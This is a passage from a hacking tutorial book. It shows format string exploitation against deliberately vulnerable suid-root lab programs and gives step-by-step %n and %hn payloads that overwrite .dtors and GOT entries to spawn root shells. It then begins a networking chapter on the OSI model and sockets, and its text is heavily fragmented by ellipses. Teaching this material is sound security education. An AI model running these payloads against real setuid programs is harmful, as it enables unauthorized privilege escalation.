2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 1230 credits] ->
Change user name
Enter your new name: Your name has been changed
...

reader@hacking:~/booksrc $

As you might have already noticed, this program also runs suid root
...
As with the stack-based overflow, shellcode can be stashed in an environment variable
...
Notice the dash argument following the exploit buffer in the cat
command
...
Even though the root shell doesn't display
its prompt, it is still accessible and still escalates privileges
...
/shellcode
...
/getenvaddr SHELLCODE
...
"A"x100
...
"1\n"' > exploit_buffer
reader@hacking:~/booksrc $ cat exploit_buffer - |
...
Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!
10 credits have been deducted from your account
...

You now have 60 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
Change user name
Enter your new name: Your name has been changed
...
Like buffer overflow exploits, format string exploits also depend
on programming mistakes that may not appear to have an obvious impact on
security
...
Although format string
vulnerabilities aren't very common anymore, the following techniques can also be
used in other situations
...
They have been
used extensively with functions like printf() in previous programs
...
Each format parameter expects an additional variable to be passed,
so if there are three format parameters in a format string, there should be three
more arguments to the function (in addition to the format string argument)
...

Parameter   Input Type   Output Type
%d          Value        Decimal
%u          Value        Unsigned decimal
%x          Value        Hexadecimal
%s          Pointer      String
%n          Pointer      Number of bytes written so far

The previous chapter demonstrated the use of the more common format
parameters, but neglected the less common %n format parameter
...
c code demonstrates its use
...
c
#include ...
h>
int main() {
int A = 5, B = 7, count_one, count_two;
// Example of a %n format string

printf("The number of bytes written up to this point X%n is being stored in
count_one, and the number of bytes up to here X%n is being stored in
count_two
...
B is %x
...
The
following is the output of the program's compilation and execution
...
c
reader@hacking:~/booksrc $
...
out
The number of bytes written up to this point X is being stored in count_one, and the
number of
bytes up to here X is being stored in count_two
...
B is 7
...
When a format function
encounters a %n format parameter, it writes the number of bytes that have been
written by the function to the address in the corresponding function argument
...
The
values are then printed, revealing that 46 bytes are written before the first %n
and 113 before the second
...
B is %x
...
First the value of B, then the address of A,
then the value of A, and finally the address of the format string
...

The format function iterates through the format string one character at a time
...
If a format parameter is
encountered, the appropriate action is taken, using the argument in the stack
corresponding to that parameter
...

But what if only two arguments are pushed to the stack with a format string that
uses three format parameters? Try removing the last argument from the
printf() line for the stack example so it matches the line shown below
...
B is %x
...

reader@hacking:~/booksrc $ sed -e 's/, B)/)/' fmt_uncommon
...
c
reader@hacking:~/booksrc $ diff fmt_uncommon
...
c
14c14
< printf("A is %d and is at %08x
...
\n", A, &A, B);
---
> printf("A is %d and is at %08x
...
\n", A, &A);
reader@hacking:~/booksrc $ gcc fmt_uncommon2
...
/a
...

count_one: 46
count_two: 113
A is 5 and is at bffffc24
...

reader@hacking:~/booksrc $

The result is b7fd6ff4
...
This means 0xb7fd6ff4 is the first value found below the stack frame for
the format function
...
It certainly would be a lot
more useful if there were a way to control either the number of arguments passed
to or expected by a format function
...

The Format String Vulnerability

Sometimes programmers use printf(string) instead of printf("%s", string)
to print strings
...
The format function is passed the
address of the string, as opposed to the address of a format string, and it iterates
through the string, printing each character
...
c
...
c
#include ...
h>
#include ...
c
...
c
reader@hacking:~/booksrc $ sudo chown root:root
...
/fmt_vuln
reader@hacking:~/booksrc $
...
But what happens if the string
contains a format parameter? The format function should try to evaluate the
format parameter and access the appropriate function argument by adding to the
frame pointer
...

reader@hacking:~/booksrc $
...
This process can be used repeatedly to
examine stack memory
...
/fmt_vuln $(perl -e 'print "%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x

...

%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
b7fe75fc
...
78383025
...
30252e78
...
2e783830
...
3830252e

...
252e7838
...
78383025
...
30252e78
...
2e783830
...
3830252e

...
252e7838
...
78383025
...
30252e78
...
2e783830
...
3830252e
...
252e7838
...
78383025
...
30252e78
...
2e783830
...
3830252e
...
Remember that each four-byte
word is backward, due to the little-endian architecture
...
Wonder what those bytes are?
reader@hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n"
%08x
...
Because the
format function will always be on the highest stack frame, as long as the format
string has been stored anywhere on the stack, it will be located below the current
frame pointer (at a higher memory address)
...
It is particularly useful if format parameters
that pass by reference are used, such as %s or %n
...

Since it's possible to read the data of the original format string, part of the
original format string can be used to supply an address to the %s format
parameter, as shown here:
reader@hacking:~/booksrc $
...
%08x
...
%08x

The right way to print user-controlled input:
AAAA%08x
...
%08x
...
b7fe75fc
...
41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

The four bytes of 0x41 indicate that the fourth format parameter is reading from
the beginning of the format string to get its data
...
This will cause the program to crash in a segmentation fault, since
this isn't a valid address
...

reader@hacking:~/booksrc $ env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
reader@hacking:~/booksrc $
...
/fmt_vuln
PATH will be at 0xbffffdd7
reader@hacking:~/booksrc $
...
%08x
...
%s
The right way to print user-controlled input:
????%08x
...
%08x
...
b7fe75fc
...
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:
/bin:/
usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

Here the getenvaddr program is used to get the address for the environment
variable PATH
...

The fourth format parameter of %s reads from the beginning of the format string,
thinking it's the address that was passed as a function argument
...

Now that the distance between the end of the stack frame and the beginning of
the format string memory is known, the field-width arguments can be omitted in
the %x format parameters
...
Using this technique, any memory address can be examined as
a string
...
Now things are getting interesting
...
c program, just begging to be overwritten
...

reader@hacking:~/booksrc $
...
%08x
...
%s
The right way to print user-controlled input:
????%08x
...
%08x
...
b7fe75fc
...
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:
/bin:/
usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
...
%08x
...
%n
The right way to print user-controlled input:
??%08x
...
%08x
...
b7fe75fc
...

[*] test_val @ 0x08049794 = 31 0x0000001f
reader@hacking:~/booksrc $

As this shows, the test_val variable can indeed be overwritten using the %n
format parameter
...
This can be controlled to a greater degree by
manipulating the field width option
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%n
The right way to print user-controlled input:
??%x%x%x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = 21 0x00000015
reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%180x%n
The right way to print user-controlled input:
??%x%x%180x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 200 0x000000c8
reader@hacking:~/booksrc $
...
These lines, in turn, can be used to control the number of
bytes written before the %n format parameter
...

Looking at the hexadecimal representation of the test_val value, it's apparent
that the least significant byte can be controlled fairly well
...
) This detail can be used to write an entire address
...
In
memory, the first byte of the test variable should be 0xAA, then 0xBB, then 0xCC,
and finally 0xDD
...
The first write
will write the value 0x000000aa, the second 0x000000bb, the third 0x000000cc,
and finally 0x000000dd
...

reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%150x%n
The right way to print user-controlled input:
??%x%x%150x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa
reader@hacking:~/booksrc $

The last %x format parameter uses 8 as the field width to standardize the output
...
Since the first overwrite puts 28 into test_val,
using 150 as the field width instead of 8 should control the least significant byte of
test_val to 0xAA
...
Another argument is needed for another %x format
parameter to increment the byte count to 187, which is 0xBB in hexadecimal
...
Since this is all still in the
memory of the format string, it can be easily controlled
...

After that, the next memory address to be written to, 0x08049755, should be put
into memory so the second %n format parameter can access it
...
But all of these bytes
of memory are also printed by the format function, thus incrementing the byte
counter used for the %n format parameter
...

Perhaps we should think about the beginning of the format string ahead of time
...
Each one will need to have a memory address
passed to it, and among them all, four bytes of junk are needed to properly
increment the byte counter for the %n format parameters
...
For the entire write procedure, the
beginning of the format string should look like this:

Figure 0x300-4
...

reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa
reader@hacking:~/booksrc $

The addresses and junk data at the beginning of the format string changed the
value of the necessary field width option for the %x format parameter
...
Another way this
could have been done is to subtract 24 from the previous field width value of 150,
since 6 new 4-byte words have been added to the front of the format string
...

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"
$1 = 17
reader@hacking:~/booksrc $
...
A hexadecimal
calculator quickly shows that 17 more bytes need to be written before the next %n
format parameter
...

This process can be repeated for the third and fourth writes
...
/fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0 4b4e554a 4b4e554a 4b4e554a
[*] test_val @ 0x08049794 = -573785174 0xddccbbaa
reader@hacking:~/booksrc $

By controlling the least significant byte and performing four writes, an entire
address can be written to any memory address
...

This can be quickly explored by statically declaring another initialized variable
called next_val, right after test_val, and also displaying this value in the debug
output
...

Here, next_val is initialized with the value 0x11111111, so the effect of the write
operations on it will be apparent
...
c > fmt_vuln2
...
c fmt_vuln2
...
c
reader@hacking:~/booksrc $
...
However, next_val is shown to be adjacent to it
...

Last time, a very convenient address of 0xddccbbaa was used
...
But what if an address like 0x0806abcd is used? With this address, the first
byte of 0xCD is easy to write using the %n format parameter by outputting 205
bytes in total, with a field width of 161
...
It's easy to increment the
byte counter for the %n format parameter, but it's impossible to subtract from it
...
/fmt_vuln2 AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x080497f4 = -72 0xffffffb8
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5"
$1 = 200
reader@hacking:~/booksrc $
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0
[*] test_val @ 0x080497f4 = 52 0x00000034
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 52 + 8"
$1 = 161
reader@hacking:~/booksrc $
...
This technique can be used to wrap around
again and set the least significant byte to 0x06 for the third write
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0
4b4e554a
[*] test_val @ 0x080497f4 = 109517 0x0001abcd
[*] next_val @ 0x080497f8 = 286331136 0x11111100
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x06 - 0xab"
$1 = -165
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x106 - 0xab"
$1 = 91
reader@hacking:~/booksrc $
...
The wraparound technique seems to be working fine, but a slight
problem manifests itself as the final byte is attempted
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%2x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%2x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
0
4b4e554a
4b4e554a4b4e554a
[*] test_val @ 0x080497f4 = 235318221 0x0e06abcd
[*] next_val @ 0x080497f8 = 285212674 0x11000002
reader@hacking:~/booksrc $

What happened here? The difference between 0x06 and 0x08 is only two, but
eight bytes are output, resulting in the byte 0x0e being written by the %n format
parameter, instead
...
This
problem can be alleviated by simply wrapping around again; however, it's good to
know the limitations of the field width option
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%258x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
0
4b4e554a
4b4e554a
4b4e554a
[*] test_val @ 0x080497f4 = 134654925 0x0806abcd
[*] next_val @ 0x080497f8 = 285212675 0x11000003
reader@hacking:~/booksrc $

Just like before, the appropriate addresses and junk data are put in the beginning
of the format string, and the least significant byte is controlled for four write
operations to overwrite all four bytes of the variable test_val
...
Also, any additions less than eight may need to be wrapped around
in a similar fashion
...
In the previous
exploits, each of the format parameter arguments had to be stepped through
sequentially
...
In addition, the sequential nature required three 4-byte words of junk to
properly write a full address to an arbitrary memory location
...
For example, %n$d would access the nth
parameter and display it as a decimal number
...
The second format
parameter accesses the fourth parameter and uses a field width option of 05
...
This method of direct access
eliminates the need to step through memory until the beginning of the format
string is located, since this memory can be accessed directly
...

reader@hacking:~/booksrc $
...
/fmt_vuln AAAA%4\$x
The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

In this example, the beginning of the format string is located at the fourth
parameter argument
...

Since this is being done on the command line and the dollar sign is a special
character, it must be escaped with a backslash
...
The actual
format string can be seen when it is printed correctly
...
Since
memory can be accessed directly, there's no need for four-byte spacers of junk
data to increment the byte output count
...
For practice, let's use direct parameter access to write a
more realistic-looking address of 0xbffffd72 into the variable test_val
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
Direct parameter access is only
used for the %n parameters, since it really doesn't matter what values are used for
the %x spacers
...

Using Short Writes
Another technique that can simplify format string exploits is using short writes
...
A more complete description of possible format parameters
can be found in the printf manual page
...

The length modifier
Here, integer conversion stands for d, i, o, u, x, or X conversion
...

This can be used with format string exploits to write two-byte shorts
...
Naturally, direct parameter access can still be used
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = -65515 0xffff0015

reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn
The right way to print user-controlled input:
??%4$hn
The wrong way to print user-controlled input:
??
[*] test_val @ 0x08049794 = 327608 0x0004ffb8
reader@hacking:~/booksrc $

Using short writes, an entire four-byte value can be overwritten with just two %hn
parameters
...

reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xfd72 - 8
$1 = 64874
(gdb) p 0xbfff - 0xfd72
$2 = -15731
(gdb) p 0x1bfff - 0xfd72
$3 = 49805
(gdb) quit
reader@hacking:~/booksrc $
...
Using short
writes, the order of the writes doesn't matter, so the first write can be 0xfd72 and
the second 0xbfff, if the two passed addresses are swapped in position
...

(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xfd72 - 0xbfff
$2 = 15731
(gdb) quit
reader@hacking:~/booksrc $
...
One option is to overwrite the return address
in the most recent stack frame, as was done with the stack-based overflows
...
The nature of stack-based overflows only allows the overwrite
of the return address, but format strings provide the ability to overwrite any
memory address, which creates other possibilities
...
dtors
In binary programs compiled with the GNU C compiler, special table sections
called
...
ctors are made for destructors and constructors,
respectively
...
The destructor functions and the
...

A function can be declared as a destructor function by defining the destructor
attribute, as seen in dtors_sample
...

dtors_sample
...
h>
#include ...
\n");
printf("and then when main() exits, the destructor is called
...
\n");
}

In the preceding code sample, the cleanup() function is defined with the
destructor attribute, so the function is automatically called when the main()
function exits, as shown next
...
c
reader@hacking:~/booksrc $
...

and then when main() exits, the destructor is called
...

reader@hacking:~/booksrc $

This behavior of automatically executing a function on exit is controlled by the

...
This section is an array of 32-bit addresses terminated by a NULL address
...
Between these two are the addresses
of all the functions that have been declared with the destructor attribute
...

reader@hacking:~/booksrc $ nm
...
get_pc_thunk
...
0
080496b0 A _edata
080496b4 A _end
080484b0 T _fini
080484e0 R _fp_hw
0804827c T _init
080482f0 T _start
08048314 t call_gmon_start
080483e8 t cleanup

080496b0 b completed
...
0
08048380 t frame_dummy
080483b4 T main
080496ac d p
...
0
reader@hacking:~/booksrc $

The nm command shows that the cleanup() function is located at 0x080483e8
(shown in bold above)
...
dtors section starts at 0x080495ac
with __DTOR_LIST__ and ends at 0x080495b4 with __DTOR_END__
...

The objdump command shows the actual contents of the
...
The first value of 80495ac is
simply showing the address where the
...
Then the actual
bytes are shown, as opposed to DWORDs, which means the bytes are reversed
...

reader@hacking:~/booksrc $ objdump -s -j
...
/dtors_sample

...
dtors:
80495ac ffffffff e8830408 00000000
...
dtors section is that it is writable
...
dtors section isn't
labeled READONLY
...
/dtors_sample

...
interp 00000013 08048114 08048114 00000114 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
1
...
ABI-tag 00000020 08048128 08048128 00000128 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
2
...
dynsym 00000060 08048174 08048174 00000174 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
4
...
gnu
...
gnu
...
rel
...
rel
...
init 00000017 0804827c 0804827c 0000027c 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
10
...
text 000001c0 080482f0 080482f0 000002f0 2**4
CONTENTS, ALLOC, LOAD, READONLY, CODE
12
...
rodata 000000bf 080484e0 080484e0 000004e0 2**5
CONTENTS, ALLOC, LOAD, READONLY, DATA
14
...
ctors 00000008 080495a4 080495a4 000005a4 2**2
CONTENTS, ALLOC, LOAD, DATA
16
...
jcr 00000004 080495b8 080495b8 000005b8 2**2

CONTENTS, ALLOC, LOAD, DATA
18
...
got 00000004 08049684 08049684 00000684 2**2
CONTENTS, ALLOC, LOAD, DATA
20
...
plt 0000001c 08049688 08049688 00000688 2**2
CONTENTS, ALLOC, LOAD, DATA
21
...
bss 00000004 080496b0 080496b0 000006b0 2**2
ALLOC
23
...
debug_aranges 00000058 00000000 00000000 000007e0 2**3
CONTENTS, READONLY, DEBUGGING
25
...
debug_info 000001ad 00000000 00000000 0000085d 2**0
CONTENTS, READONLY, DEBUGGING
27
...
debug_line 0000013d 00000000 00000000 00000a70 2**0
CONTENTS, READONLY, DEBUGGING
29
...
debug_ranges 00000048 00000000 00000000 00000c68 2**3
CONTENTS, READONLY, DEBUGGING
reader@hacking:~/booksrc $

Another interesting detail about the
...
This means that the vulnerable
format string program, fmt_vuln
...
dtors section containing
nothing
...

reader@hacking:~/booksrc $ nm
...
dtors
...
/fmt_vuln: file format elf32-i386
Contents of section
...

reader@hacking:~/booksrc $

As this output shows, the distance between __DTOR_LIST__ and __DTOR_END__ is
only four bytes this time, which means there are no addresses between them
...

Since the
...
This will be the address of
__DTOR_LIST__ plus four, which is 0x08049694 (which also happens to be the
address of __DTOR_END__ in this case)
...

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode
...
/getenvaddr SHELLCODE
...
Since the program name lengths of the helper program
getenvaddr
...
c program differ by two bytes, the
shellcode will be located at 0xbffff9ec when fmt_vuln
...
This address
simply has to be written into the
...
In the output below the short write
method is used
...
/fmt_vuln | grep DTOR
08049694 d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $
...
2# whoami
root
sh-3
...
dtors section isn't properly terminated with a NULL address of
0x00000000, the shellcode address is still considered to be a destructor function
...

Another notesearch Vulnerability
In addition to the buffer overflow vulnerability, the notesearch program from
Chapter 0x200 also suffers from a format string vulnerability
...

int print_notes(int fd, int uid, char *searchstring) {
int note_length;
char byte=0, note_buffer[100];
note_length = find_user_note(fd, uid);
if(note_length == -1) // If end of file reached,
return 0; // return 0
...

note_buffer[note_length] = 0; // Terminate the string
...

return 1;
}

This function reads the note_buffer from the file and prints the contents of the
note without supplying its own format string
...
In the following output, the notetaker
program is used to create notes to probe memory in the notesearch program
...

reader@hacking:~/booksrc $
...
"x10')
[DEBUG] buffer @ 0x804a008: 'AAAA%x
...
%x
...
%x
...
%x
...
%x
...
'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch AAAA
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
AAAAbffff750
...
20435455
...
0
...
1
...
252e7825
...

-------[ end of note data ]-------
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
dtors section with the address of injected shellcode
...
bin)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff9e8
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9e8 - 0xbfff
$2 = 14825
(gdb) quit
reader@hacking:~/booksrc $ nm
...
/notetaker $(printf "\x62\x9c\x04\x08\x60\x9c\x04\x08")%49143x%8\$hn%14825x%9\$hn
[DEBUG] buffer @ 0x804a008: 'b?`?%49143x%8$hn%14825x%9$hn'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch 49143x
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999

21
-------[ end of note data ]-------
sh-3
...
2#

Overwriting the Global Offset Table
Since a program could use a function in a shared library many times, it's useful to
have a table to reference all the functions
...

This section consists of many jump instructions, each one corresponding to the
address of a function
...

An object dump disassembling the PLT section in the vulnerable format string
program (fmt_vuln
...
plt
...
/fmt_vuln: file format elf32-i386
Disassembly of section
...

080482c8 <__gmon_start__@plt>:
80482c8: ff 25 74 97 04 08 jmp *0x8049774
80482ce: 68 00 00 00 00 push $0x0
80482d3: e9 e0 ff ff ff jmp 80482b8 <_init+0x18>
080482d8 <__libc_start_main@plt>:
80482d8: ff 25 78 97 04 08 jmp *0x8049778
80482de: 68 08 00 00 00 push $0x8
80482e3: e9 d0 ff ff ff jmp 80482b8 <_init+0x18>

080482e8 <strcpy@plt>:
80482e8: ff 25 7c 97 04 08 jmp *0x804977c
80482ee: 68 10 00 00 00 push $0x10
80482f3: e9 c0 ff ff ff jmp 80482b8 <_init+0x18>
080482f8 <printf@plt>:
80482f8: ff 25 80 97 04 08 jmp *0x8049780
80482fe: 68 18 00 00 00 push $0x18
8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>
08048308 <exit@plt>:
8048308: ff 25 84 97 04 08 jmp *0x8049784
804830e: 68 20 00 00 00 push $0x20
8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>
reader@hacking:~/booksrc $

One of these jump instructions is associated with the exit() function, which is
called at the end of the program
...
Below, the procedure linkage
table is shown to be read-only
...
/fmt_vuln | grep -A1 "\
...
plt 00000060 080482b8 080482b8 000002b8 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE

But closer examination of the jump instructions (shown in bold below) reveals that
they aren't jumping to addresses but to pointers to addresses
...

080482f8 <printf@plt>:
80482f8: ff 25 80 97 04 08 jmp *0x8049780
80482fe: 68 18 00 00 00 push $0x18
8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>
08048308 <exit@plt>:
8048308: ff 25 84 97 04 08 jmp *0x8049784
804830e: 68 20 00 00 00 push $0x20
8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>

These addresses exist in another section, called the global offset table (GOT), which is
writable
...

reader@hacking:~/booksrc $ objdump -R
...
/fmt_vuln: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049764 R_386_GLOB_DAT __gmon_start__
08049774 R_386_JUMP_SLOT __gmon_start__
08049778 R_386_JUMP_SLOT __libc_start_main
0804977c R_386_JUMP_SLOT strcpy
08049780 R_386_JUMP_SLOT printf
08049784 R_386_JUMP_SLOT exit

reader@hacking:~/booksrc $

This reveals that the address of the exit() function (shown in bold above) is
located in the GOT at 0x08049784
...

As usual, the shellcode is put in an environment variable, its actual location is
predicted, and the format string vulnerability is used to write the value
...

The calculations for the %x format parameters will be done once again for clarity
...

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode
...
/getenvaddr SHELLCODE
...
/fmt_vuln

...
/fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????

b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3
...
2#

When fmt_vuln
...
Since the actual
address has been switched with the address for the shellcode in the environment,
a root shell is spawned
...

The ability to overwrite any arbitrary address opens up many possibilities for
exploitation
...

Chapter 0x400
...
By using a common language, humans are able to transfer knowledge,
coordinate actions, and share experiences
...
The real utility of a web browser isn't in the program itself, but in
its ability to communicate with webservers
...
Many
applications such as email, the Web, and instant messaging rely on networking
...

Many people don't realize that there are vulnerabilities in the networking
protocols themselves
...

OSI Model
When two computers talk to each other, they need to speak the same language
...
The OSI
model provides standards that allow hardware, such as routers and firewalls, to
focus on one particular aspect of communication that applies to them and ignore
others
...

This way, routing and firewall hardware can focus on passing data at the lower
layers, ignoring the higher layers of data encapsulation used by running
applications
...
This is the lowest layer, whose primary role is communicating raw bit streams
...

Data-link layer This layer deals with actually transferring data between two points.
In contrast with the physical layer, which takes care of sending the raw bits, this
layer provides high-level functions, such as error correction and flow control
...

Network layer This layer works as a middle ground; its primary role is to pass
information between the lower and the higher layers
...

Transport layer This layer provides transparent transfer of data between systems
...

Session layer This layer is responsible for establishing and maintaining connections
between network applications
...
This allows for things like encryption and
data compression
...

When data is communicated through these protocol layers, it's sent in small
pieces called packets
...
Starting from the application layer, the packet wraps the presentation
layer around that data, which wraps the session layer, which wraps the transport
layer, and so forth
...
Each wrapped layer
contains a header and a body
...
The body of
one layer contains the entire package of previously encapsulated layers, like the
skin of an onion or the functional contexts found on a program's stack
...
The next layer is the data link layer
...
This protocol allows for
communication between Ethernet ports, but these ports don't yet have IP
addresses
...
In addition to addressing, this layer is responsible for moving data
from one address to another
...
The next layer is the transport
layer, which for web traffic is TCP; it provides a seamless bidirectional socket
connection
...
Other addressing schemes exist at this layer; however, your
web traffic probably uses IP version 4 (IPv4)
...
XX
...
XX
...
Since IPv4 is most common, IP will always refer to IPv4 in this
book
...
When you browse the Web, the web
browser on your network is communicating across the Internet with the
webserver located on a different private network
...
Since the router isn't concerned with what's actually in the packets, it only
needs to implement protocols up to the network layer
...
This
router then encapsulates this packet with the lower-layer protocol headers needed
for the packet to reach its final destination
...

Figure 0x400-1
...
These
protocols are programmed into routers, firewalls, and your computer's operating
system so they can communicate
...
Since the operating system takes care of
the details of network encapsulation, writing network programs is just a matter of
using the network interface of the OS
...
A
socket can be thought of as an endpoint to a connection, like a socket on an
operator's switchboard
...
To
the programmer, a socket can be used to send or receive data over a network
...
There are several different
types of sockets that determine the structure of the transport layer (4)
...

Stream sockets provide reliable two-way communication similar to when you call
someone on the phone
...
In
addition, there is immediate confirmation that what you said actually reached its
destination
...
On computer networks, data is usually transmitted in chunks called
packets
...
Webservers, mail servers, and their
respective client applications all use TCP and stream sockets to communicate
...
Communicating with a
datagram socket is more like mailing a letter than making a phone call
...
If you mail several letters, you can't be
sure that they arrived in the same order, or even that they reached their
destination at all
...
Datagram sockets use another standard protocol called UDP instead of TCP
on the transport layer (4)
...
This protocol is very basic and
lightweight, with few safeguards built into it
...
With datagram sockets,
there is very little overhead in the protocol, but the protocol doesn't do much
...
In some cases
packet loss is acceptable
...

Socket Functions

In C, sockets behave a lot like files since they use file descriptors to identify
themselves
...

However, there are several functions specifically designed for dealing with
sockets
...
h
...

connect(int fd, struct sockaddr *remote_host, socklen_t addr_length)

Connects a socket (described by file descriptor fd) to a remote host
...

bind(int fd, struct sockaddr *local_addr, socklen_t addr_length)

Binds a socket to a local address so it can listen for incoming connections
...

